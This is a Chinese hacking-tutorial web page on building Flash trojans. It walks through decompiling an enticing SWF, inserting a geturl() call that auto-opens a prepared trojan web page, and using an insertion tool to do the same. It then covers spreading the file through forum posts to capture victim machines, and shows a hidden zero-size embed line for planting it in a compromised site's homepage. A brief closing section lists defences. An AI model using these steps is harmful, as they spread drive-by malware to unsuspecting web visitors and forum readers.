首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 黑客教程

Flash木马程序是怎样练成的


http://www.gipsky.com/
一、制作flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的预备



  flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的原理,是在网页中显示或本地直接播放flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>时,让flash自动打开一个网址,而该网址就是我们预先制作好的一个<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>网页。也就是说,在制作网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>前,我们首先需要制作好一个网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>,并将它放置到某个网站上去。



  另外,我们还需要预备一个比较吸引人的flash动画文件“mm热舞.swf”,以及flash动画反编译工具“闪客精灵”,编辑工具macromedia flash mx。



  二、最原始的flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>



  现在虽然有了许多各种各样的flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>制作工具,但是为了了解flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的最基本原理,有必要从头开始用最原始的方法制作一个flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>。



  步骤一:反编译swf动画



  首先我们需要将要插入网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的flash动画文件“mm热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件” →“快速打开”命令,指定“mm热舞.swf”文件将其导入。然后点击工具栏上的“导出fla”命令,将动画导出为“mm热舞.fla”文件。



  步骤二:插入网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>代码



  然后运行flash动画编辑器macromedia flash mx,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的 “geturl”命令,在右边窗口中的“url”里面输入我们的网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>地址;窗口方式为“_blank”;“变量”设置为“使用get方式发送”,在下方的代码窗口中将出现“geturl("http://网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>地址", "_blank", "get");”。



  步骤三:生成flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>

  设置完毕后保存文件,并点击菜单“文件”→“发布”命令,将动画重新导出为swf格式。用ie浏览器打开刚才生成的flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>,可以看到随着flash动画打开播放时,自动弹出一个浏览器窗口,里面将会显示我们的<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>网页。$page_devide$

 三、简简单单生成flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>







  上面插入<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>在网上随处可见。



  运行swf<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>插入器,点击界面中的“选择”按钮,浏览指定要插入<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的swf文件;在“插入代码”中输入<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>网页的地址;切记不要勾选下面的 “只解压”项。设置完毕后,点击“给我插”按钮,程序提示开始插入<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>网页。显示成功信息后,关闭程序,用ie打开生成的动画,可以看到自动跳转到<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>网页去了。



  四、flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的利用



  看到上面的步骤了吧,生成一个flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>是不是很简单?那么生成的flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>该如何应用呢?只要我们将flash上传到某个网站中,就可以通过论坛或网站之类的直接利用了。



  大部分的论坛中都可以发来flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以phpwind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入flash动画”按钮,设置flash窗口大小,使用默认设置后,要求输入flash的url地址。确定后,可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp: //www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的flash播放代码了,不同的论坛代码是不一样的。



  应用二:网页嵌入flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>



  攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被治理员发觉,但是挂上flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的话,是很难查杀的。攻击者可能在网页中插入如下代码:



  “《embed src=http://网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>地址/<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>.swf width=0 height=0 type=application/x-shockwave-flash autostart="false" showstatusbar="false"》”,其中的《》改为<>。



  这里的参数“width=0 height=0”表示,flash播放窗口为零,也就是不显示flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>网页窗口。



  五、关于flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>的防范



  其实不管flash<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>有多么的巧妙,最终都是要跳转到<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>网页去的,也就是说我们最终要防范的还是网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>。了解了思路,对于flash动画<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>就简单了:



  首先,要开启windows xp sp2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。假如那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了!
<< 数据库下载漏洞 LBS blog sql注射漏洞(统杀所有版本) >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号